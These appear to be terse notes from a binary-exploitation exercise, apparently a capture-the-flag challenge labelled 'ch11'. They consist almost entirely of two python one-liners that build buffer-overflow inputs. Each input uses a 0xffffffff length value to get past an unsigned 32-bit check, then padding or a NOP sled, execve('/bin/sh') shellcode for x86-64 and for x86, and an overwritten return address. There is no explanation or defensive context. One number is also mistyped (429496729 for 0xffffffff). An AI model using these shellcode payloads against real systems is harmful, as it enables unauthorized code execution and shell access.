uint32_t: 0 – 4294967295
429496729 = \xff\xff\xff\xff 



ch11 server:

python -c 'import sys; sys.stdout.write("\xff" * 4 + "/" + "\x41" * 126 + "C"  * 30 + "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05")' > /tmp
/x11



local:
python -c 'print "\xff" * 4 + "/" + "\x90" * (140-28) + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "\x7b\xb1\x04\x08"' > x5




ret : 0x804865a -> nop
